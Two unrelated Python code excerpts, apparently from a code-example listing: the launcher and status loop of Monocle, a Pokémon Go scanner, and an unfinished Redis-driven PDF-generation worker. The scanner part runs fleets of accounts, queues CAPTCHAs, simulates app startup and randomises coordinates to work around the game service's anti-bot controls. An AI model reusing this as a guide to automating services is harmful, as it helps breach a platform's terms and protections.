            self.log.exception('{} occurred while printing status.', e.__class__.__name__)
        self.print_handle = LOOP.call_later(refresh, self.print_status)

    async def exit_progress(self):
        while self.coroutines_count > 2:
            try:
                self.update_coroutines_count(simple=False)
                pending = len(db_proc)
                # Spaces at the end are important, as they clear previously printed
                # output - \r doesn't clean whole line
                print(
                    '{} coroutines active, {} DB items pending   '.format(
                        self.coroutines_count, pending),
                    end='\r'
                )
                await sleep(.5)
            except CancelledError:
                return
            except Exception as e:
                self.log.exception('A wild {} appeared in exit_progress!', e.__class__.__name__)

    def update_stats(self, refresh=conf.STAT_REFRESH, med=median, count=conf.GRID[0] * conf.GRID[1]):
        visits = []
        seen_per_worker = []
        after_spawns = []
        speeds = []

        for w in self.workers:
            after_spawns.append(w.after_spawn)
            seen_per_worker.append(w.total_seen)
            visits.append(w.visits)
            speeds.append(w.speed)

        self.stats = (
            'Seen per worker: min {}, max {}, med {:.0f}\n'
            'Visits per worker: min {}, max {}, med {:.0f}\n'
            'Visit delay: min {:.1f}, max {:.1f}, med {:.1f}\n'
            'Speed: min {:.1f}, max {:.1f}, med {:.1f}\n'
            'Extra accounts: {}, CAPTCHAs needed: {}\n'
        ).format(
            min(seen_per_worker), max(seen_per_worker), med(seen_per_worker),
            min(visits), max(visits), med(visits),
            min(after_spawns), max(after_spawns), med(after_spawns),
            min(speeds), max(speeds), med(speeds),
            self.extra_queue.qsize(), self.captcha_queue.qsize()
        )

        self.sighting_cache_size = len(SIGHTING_CACHE.store)
        self.mystery_cache_size = len(MYSTERY_CACHE.store)

        self.update_coroutines_count()
        self.counts = (
            'Known spawns: {}, unknown: {}, more: {}\n'
            '{} workers, {} coroutines\n'
            'sightings cache: {}, mystery cache: {}, DB queue: {}\n'
        ).format(
            len(spawns), len(spawns.unknown), spawns.cells_count,
            count, self.coroutines_count,
            len(SIGHTING_CACHE), len(MYSTERY_CACHE), len(db_proc)
        )
        LOOP.call_later(refresh, self.update_stats)

    def get_dots_and_messages(self):
        """Returns status dots and status messages for workers

        Dots meaning:
        . = visited more than a minute ago
        , = visited less than a minute ago, no pokemon seen
        0 = visited less than a minute ago, no pokemon or forts seen
        : = visited less than a minute ago, pokemon seen
        ! = currently visiting
        | = cleaning bag
        $ = spinning a PokéStop
        * = sending a notification
        ~ = encountering a Pokémon
        I = initial, haven't done anything yet
        » = waiting to log in (limited by SIMULTANEOUS_LOGINS)
        ° = waiting to start app simulation (limited by SIMULTANEOUS_SIMULATION)
        ∞ = bootstrapping
        L = logging in
        A = simulating app startup
        T = completing the tutorial
        X = something bad happened
        C = CAPTCHA

        Other letters: various errors and procedures
        """
        dots = []
        messages = []
        row = []
        for i, worker in enumerate(self.workers):
            if i > 0 and i % conf.GRID[1] == 0:
                dots.append(row)
                row = []
            if worker.error_code in BAD_STATUSES:
                row.append('X')
                messages.append(worker.status.ljust(20))
            elif worker.error_code:
                row.append(worker.error_code[0])
            else:
                row.append('.')
        if row:
            dots.append(row)
        return dots, messages

    def update_coroutines_count(self, simple=True, loop=LOOP):
        try:
            tasks = Task.all_tasks(loop)
            self.coroutines_count = len(tasks) if simple else sum(not t.done() for t in tasks)
        except RuntimeError:
            # Set changed size during iteration
            self.coroutines_count = -1

    def _print_status(self, _ansi=ANSI, _start=datetime.now(), _notify=conf.NOTIFY):
        running_for = datetime.now() - _start

        seconds_since_start = running_for.seconds - self.idle_seconds or 0.1
        hours_since_start = seconds_since_start / 3600

        output = [
            '{}Monocle running for {}'.format(_ansi, running_for),
            self.counts,
            self.stats,
            self.pokemon_found,
            ('Visits: {}, per second: {:.2f}\n'
             'Skipped: {}, unnecessary: {}').format(
                self.visits, self.visits / seconds_since_start,
                self.skipped, self.redundant)
        ]

        try:
            seen = Worker.g['seen']
            captchas = Worker.g['captchas']
            output.append('Seen per visit: {v:.2f}, per minute: {m:.0f}'.format(
                v=seen / self.visits, m=seen / (seconds_since_start / 60)))

            if captchas:
                captchas_per_request = captchas / (self.visits / 1000)
                captchas_per_hour = captchas / hours_since_start
                output.append(
                    'CAPTCHAs per 1K visits: {r:.1f}, per hour: {h:.1f}, total: {t:d}'.format(
                    r=captchas_per_request, h=captchas_per_hour, t=captchas))
        except ZeroDivisionError:
            pass

        try:
            hash_status = HashServer.status
            output.append('Hashes: {}/{}, refresh in {:.0f}'.format(
                hash_status['remaining'],
                hash_status['maximum'],
                hash_status['period'] - time()
            ))
        except (KeyError, TypeError):
            pass

        if _notify:
            sent = Worker.notifier.sent
            output.append('Notifications sent: {}, per hour {:.1f}'.format(
                sent, sent / hours_since_start))

        output.append('')
        if not self.all_seen:
            no_sightings = ', '.join(str(w.worker_no)
                                     for w in self.workers
                                     if w.total_seen == 0)
            if no_sightings:
                output += ['Workers without sightings so far:', no_sightings, '']
            else:
                self.all_seen = True

        dots, messages = self.get_dots_and_messages()
        output += [' '.join(row) for row in dots]
        previous = 0
        for i in range(4, len(messages) + 4, 4):
            output.append('\t'.join(messages[previous:i]))
            previous = i
        if self.paused:
            output.append('\nCAPTCHAs are needed to proceed.')
        if not _ansi:
            system('cls')
        print('\n'.join(output))

    def longest_running(self):
        workers = (x for x in self.workers if x.start_time)
        worker = next(workers)
        earliest = worker.start_time
        for w in workers:
            if w.start_time < earliest:
                worker = w
                earliest = w.start_time
        minutes = ((time() * 1000) - earliest) / 60000
        return worker, minutes

    def get_start_point(self):
        smallest_diff = float('inf')
        now = time() % 3600
        closest = None

        for spawn_id, spawn_time in spawns.known.values():
            time_diff = now - spawn_time
            if 0 < time_diff < smallest_diff:
                smallest_diff = time_diff
                closest = spawn_id
            if smallest_diff < 3:
                break
        return closest

    async def update_spawns(self, initial=False):
        while True:
            try:
                await run_threaded(spawns.update)
                LOOP.create_task(run_threaded(spawns.pickle))
            except OperationalError as e:
                self.log.exception('Operational error while trying to update spawns.')
                if initial:
                    raise OperationalError('Could not update spawns, ensure your DB is set up.') from e
                await sleep(15, loop=LOOP)
            except CancelledError:
                raise
            except Exception as e:
                self.log.exception('A wild {} appeared while updating spawns!', e.__class__.__name__)
                await sleep(15, loop=LOOP)
            else:
                break

    async def launch(self, bootstrap, pickle):
        exceptions = 0
        self.next_mystery_reload = 0

        if not pickle or not spawns.unpickle():
            await self.update_spawns(initial=True)

        if not spawns or bootstrap:
            try:
                await self.bootstrap()
                await self.update_spawns()
            except CancelledError:
                return

        update_spawns = False
        self.mysteries = spawns.mystery_gen()
        while True:
            try:
                await self._launch(update_spawns)
                update_spawns = True
            except CancelledError:
                return
            except Exception:
                exceptions += 1
                if exceptions > 25:
                    self.log.exception('Over 25 errors occurred in launcher loop, exiting.')
                    return False
                else:
                    self.log.exception('Error occurred in launcher loop.')
                    update_spawns = False

    async def _launch(self, update_spawns):
        if update_spawns:
            await self.update_spawns()
            LOOP.create_task(run_threaded(dump_pickle, 'accounts', ACCOUNTS))
            spawns_iter = iter(spawns.items())
        else:
            start_point = self.get_start_point()
            if start_point and not spawns.after_last():
                spawns_iter = dropwhile(
                    lambda s: s[1][0] != start_point, spawns.items())
            else:
                spawns_iter = iter(spawns.items())

        current_hour = get_current_hour()
        if spawns.after_last():
            current_hour += 3600

        captcha_limit = conf.MAX_CAPTCHAS
        skip_spawn = conf.SKIP_SPAWN
        for point, (spawn_id, spawn_seconds) in spawns_iter:
            try:
                if self.captcha_queue.qsize() > captcha_limit:
                    self.paused = True
                    self.idle_seconds += await run_threaded(self.captcha_queue.full_wait, conf.MAX_CAPTCHAS)
                    self.paused = False
            except (EOFError, BrokenPipeError, FileNotFoundError):
                pass

            spawn_time = spawn_seconds + current_hour

            # negative = hasn't happened yet
            # positive = already happened
            time_diff = time() - spawn_time

            while time_diff < 0.5:
                try:
                    mystery_point = next(self.mysteries)

                    await self.coroutine_semaphore.acquire()
                    LOOP.create_task(self.try_point(mystery_point))
                except StopIteration:
                    if self.next_mystery_reload < monotonic():
                        self.mysteries = spawns.mystery_gen()
                        self.next_mystery_reload = monotonic() + conf.RESCAN_UNKNOWN
                    else:
                        await sleep(min(spawn_time - time() + .5, self.next_mystery_reload - monotonic()), loop=LOOP)
                time_diff = time() - spawn_time

            if time_diff > 5 and spawn_id in SIGHTING_CACHE.store:
                self.redundant += 1
                continue
            elif time_diff > skip_spawn:
                self.skipped += 1
                continue

            await self.coroutine_semaphore.acquire()
            LOOP.create_task(self.try_point(point, spawn_time, spawn_id))

    async def try_again(self, point):
        async with self.coroutine_semaphore:
            worker = await self.best_worker(point, False)
            async with worker.busy:
                if await worker.visit(point):
                    self.visits += 1

    async def bootstrap(self):
        try:
            self.log.warning('Starting bootstrap phase 1.')
            await self.bootstrap_one()
        except CancelledError:
            raise
        except Exception:
            self.log.exception('An exception occurred during bootstrap phase 1.')

        try:
            self.log.warning('Starting bootstrap phase 2.')
            await self.bootstrap_two()
        except CancelledError:
            raise
        except Exception:
            self.log.exception('An exception occurred during bootstrap phase 2.')

        self.log.warning('Starting bootstrap phase 3.')
        unknowns = list(spawns.unknown)
        shuffle(unknowns)
        tasks = (self.try_again(point) for point in unknowns)
        await gather(*tasks, loop=LOOP)
        self.log.warning('Finished bootstrapping.')

    async def bootstrap_one(self):
        async def visit_release(worker, num, *args):
            async with self.coroutine_semaphore:
                async with worker.busy:
                    point = get_start_coords(num, *args)
                    self.log.warning('start_coords: {}', point)
                    self.visits += await worker.bootstrap_visit(point)

        if bounds.multi:
            areas = [poly.polygon.area for poly in bounds.polygons]
            area_sum = sum(areas)
            percentages = [area / area_sum for area in areas]
            tasks = []
            for i, workers in enumerate(percentage_split(
                    self.workers, percentages)):
                grid = best_factors(len(workers))
                tasks.extend(visit_release(w, n, grid, bounds.polygons[i])
                             for n, w in enumerate(workers))
        else:
            tasks = (visit_release(w, n) for n, w in enumerate(self.workers))
        await gather(*tasks, loop=LOOP)

    async def bootstrap_two(self):
        async def bootstrap_try(point):
            async with self.coroutine_semaphore:
                randomized = randomize_point(point, randomization)
                LOOP.call_later(1790, LOOP.create_task, self.try_again(randomized))
                worker = await self.best_worker(point, False)
                async with worker.busy:
                    self.visits += await worker.bootstrap_visit(point)

        # randomize to within ~140m of the nearest neighbor on the second visit
        randomization = conf.BOOTSTRAP_RADIUS / 155555 - 0.00045
        tasks = (bootstrap_try(x) for x in get_bootstrap_points(bounds))
        await gather(*tasks, loop=LOOP)

    async def try_point(self, point, spawn_time=None, spawn_id=None):
        try:
            point = randomize_point(point)
            skip_time = monotonic() + (conf.GIVE_UP_KNOWN if spawn_time else conf.GIVE_UP_UNKNOWN)
            worker = await self.best_worker(point, skip_time)
            if not worker:
                if spawn_time:
                    self.skipped += 1
                return
            async with worker.busy:
                if spawn_time:
                    worker.after_spawn = time() - spawn_time

                if await worker.visit(point, spawn_id):
                    self.visits += 1
        except CancelledError:
            raise
        except Exception:
            self.log.exception('An exception occurred in try_point')
        finally:
            self.coroutine_semaphore.release()

    async def best_worker(self, point, skip_time):
        good_enough = conf.GOOD_ENOUGH
        while self.running:
            gen = (w for w in self.workers if not w.busy.locked())
            try:
                worker = next(gen)
                lowest_speed = worker.travel_speed(point)
            except StopIteration:
                lowest_speed = float('inf')
            for w in gen:
                speed = w.travel_speed(point)
                if speed < lowest_speed:
                    lowest_speed = speed
                    worker = w
                    if speed < good_enough:
                        break
            if lowest_speed < conf.SPEED_LIMIT:
                worker.speed = lowest_speed
                return worker
            if skip_time and monotonic() > skip_time:
                return None
            await sleep(conf.SEARCH_SLEEP, loop=LOOP)

    def refresh_dict(self):
        while not self.extra_queue.empty():
            account = self.extra_queue.get()
            username = account['username']
            ACCOUNTS[username] = account
Example 35
class Worker:
    def __init__(self, loop=None):
        logger.info('Worker initialising...')
        loop = loop or asyncio.get_event_loop()
        self.loop = loop
        logger.debug('Connecting to db: "%s"', DB_DSN)
        self._pool = loop.run_until_complete(create_pool(dsn=DB_DSN, loop=loop, minsize=2, maxsize=10))
        self.wkh2p_sema = Semaphore(value=MAX_WORKER_THREADS, loop=loop)
        self.worker_sema = Semaphore(value=MAX_WORKER_JOBS, loop=loop)
        self.redis = None
        self.exc_info = None

    def run_forever(self):
        self.loop.run_until_complete(self.work_loop())

    async def work_loop(self):
        # TODO deal with SIGTERM gracefully
        logger.debug('Connecting to redis on: "%s"', REDIS_HOST)
        self.redis = await aioredis.create_redis((REDIS_HOST, 6379), loop=self.loop)
        logger.info('Worker started...')
        try:
            while True:
                await self.worker_sema.acquire()
                queue, data = await self.redis.blpop(*QUEUES)
                self.loop.create_task(self.work_handler(queue, data))
        finally:
            self.redis.close()

    async def work_handler(self, queue, raw_data):
        try:
            await self.work(queue, raw_data)
        except Exception:
            logger.error('error processing job: %s', sys.exc_info()[1])
            self.exc_info = sys.exc_info()
            raise

    async def work(self, queue_raw, raw_data):
        """
        Do job, data shape:
        {
            'job_id': UUID of job,
            THEN
            'content': JSON object to use in template
            OR
            'html': HTML to generate pdf for
        }
        :param queue_raw: queue name bytes
        :param raw_data: json bytes
        :return:
        """
        queue = queue_raw.decode()
        data = raw_data.decode()
        logger.debug('starting job from queue "%s" with data "%s"', queue, data)
        data = json.loads(data)
        job_id = data['job_id']
        org_code, env_id = await self.get_basic_info(job_id)
        logger.info('starting job - %s for %s', job_id, org_code)
        await self.job_in_progress(job_id)
        content = data.get('content')
        if content:
            raise NotImplementedError()
            # TODO generate html
        else:
            html = data['html']
        await self.wkh2p_sema.acquire()
        try:
            pdf_file = await self.loop.run_in_executor(None, generate_pdf, html)
        finally:
            self.wkh2p_sema.release()
        logger.info('pdf generated - %s for %s', job_id, org_code)

        # the temporary file is not automatically deleted, so we need to make sure we do it here
        try:
            file_size = os.path.getsize(pdf_file)
            await store_file(job_id, org_code, pdf_file)
        finally:
            os.remove(pdf_file)
        await self.job_finished(job_id, html, file_size)
        logger.info('finishing job - %s for %s', job_id, org_code)
        self.worker_sema.release()

    async def job_in_progress(self, job_id):
        ctx = [JobStatus.STATUS_IN_PROGRESS, job_id]
        await self.execute('UPDATE jobs_job SET status=%s, timestamp_started=current_timestamp WHERE id=%s;', ctx)

    async def job_finished(self, job_id, html, file_size):
        ctx = [JobStatus.STATUS_COMPLETE, html, file_size, job_id]
        await self.execute('UPDATE jobs_job SET status=%s, timestamp_complete=current_timestamp, '
                           'html=%s, file_size=%s WHERE id=%s;', ctx)

    async def get_basic_info(self, job_id):
        cur = await self.execute(
            'SELECT orgs_organisation.code, resources_env.id FROM orgs_organisation '
            'INNER JOIN resources_env ON orgs_organisation.id = resources_env.org_id '
            'INNER JOIN jobs_job ON resources_env.id = jobs_job.env_id WHERE '
            'jobs_job.id = %s', [job_id])
        org, env_id = await cur.fetchone()
        return org, env_id

    async def get_env_info(self, job_id, env_id):
        cur = await self.execute(
            'SELECT r_main.ref AS main_ref, r_main.file AS main_file, '
            'r_base.ref as base_ref, r_base.file as base_file, '
            'r_header.ref as header_ref, r_header.file as header_file, '
            'r_footer.ref as footer_ref, r_footer.file as footer_file '
            'FROM resources_env '
            'JOIN resources_file AS r_main ON r_main.id = resources_env.main_template_id '
            'JOIN resources_file AS r_base ON r_base.id = resources_env.base_template_id '
            'JOIN resources_file AS r_header ON r_header.id = resources_env.header_template_id '
            'JOIN resources_file AS r_footer ON r_footer.id = resources_env.footer_template_id '
            'WHERE resources_env.id = %s', [env_id], dict_cursor=True)
        data = dict(await cur.fetchone())
        print(data)
        # FIXME, work stopped here

    @asyncio.coroutine
    def execute(self, *args, **kwargs):
        cursor_factory = kwargs.pop('dict_cursor', None) and DictCursor
        with (yield from self._pool) as conn:
            cur = yield from conn.cursor(cursor_factory=cursor_factory)
            yield from cur.execute(*args, **kwargs)
            return cur